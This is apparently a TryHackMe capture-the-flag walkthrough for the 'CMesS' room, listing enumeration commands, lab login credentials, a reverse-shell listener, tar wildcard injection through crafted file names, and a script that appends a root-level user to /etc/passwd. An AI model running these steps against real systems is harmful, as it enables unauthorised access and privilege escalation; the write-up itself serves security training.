CMesS

Room Link: https://tryhackme.com/room/cmess

Initial Scan

Kali

nmap -A cmess.thm

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 cmess.thm

TCP/80 - HTTP

Kali

gobuster dir -u http://cmess.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Mostly junk

Fuzzing Domains

Fuzzed with a long subdomain list then filtered to reduce the amount of results. Only one stands out, dev.

Kali

wfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://cmess.thm/' -H "Host: FUZZ.cmess.thm" > results.txt

grep -v '290 W' results.txt

I added dev.cmess.thm to my host file and found this page

We were able to login to the admin portal with these credentials

Username: andre@cmess.thm
Password: KPFTN_f2yxe%

Initial Shell

Exploit: https://www.exploit-db.com/raw/51569

The shell they use is bad so I upload a new one to get a reverse shell instead

Shell Link: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Kali

nc -lvnp 1337

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

We find andre's password in a backup file

Victim

cd /opt
ls -lah
cat .password.bak 

TCP/21 - SSH

Kali

ssh andre@$VICTIM
Password: UQfsdCB7aAP6

Privlege Escalation

Exploit: https://gtfobins.github.io/gtfobins/tar/

Victim

cat /etc/crontab

Victim

cd /home/andre/backups
mkdir priv
cd priv
touch ./--checkpoint=1
touch './--checkpoint-action=exec=sh shell.sh'
vi shell.sh

shell.sh

#!/bin/bash

echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd

Victim

su new
Password: 123